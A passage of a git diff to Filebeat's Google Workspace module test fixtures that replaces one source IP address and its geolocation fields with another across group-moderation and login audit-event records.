+        "log.offset": 6014,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -824,7 +768,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -842,26 +786,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 6602,
+        "log.offset": 6588,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -883,7 +823,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -901,26 +841,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 7218,
+        "log.offset": 7203,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -941,7 +877,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}",
         "event.outcome": "success",
         "event.provider": "groups",
         "event.type": [
@@ -960,26 +896,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 7759,
+        "log.offset": 7743,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1000,7 +932,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}",
         "event.outcome": "success",
         "event.provider": "groups",
         "event.type": [
@@ -1018,27 +950,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 8282,
+        "log.offset": 8265,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1064,7 +992,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "creation",
@@ -1082,27 +1010,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 8760,
+        "log.offset": 8742,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1128,7 +1052,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "group",
@@ -1146,27 +1070,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 9228,
+        "log.offset": 9209,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1192,7 +1112,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "group",
@@ -1209,27 +1129,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 9712,
+        "log.offset": 9692,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1255,7 +1171,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "group",
@@ -1272,27 +1188,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 10148,
+        "log.offset": 10127,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1318,7 +1230,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "group",
@@ -1335,27 +1247,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 10578,
+        "log.offset": 10556,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1381,7 +1289,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "group",
@@ -1398,27 +1306,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 11016,
+        "log.offset": 10993,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1444,7 +1348,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "deletion",
@@ -1461,27 +1365,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 11448,
+        "log.offset": 11424,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log
index b721c74bf484..cc181596f848 100644
--- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log
@@ -1,14 +1,14 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_password_leak","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
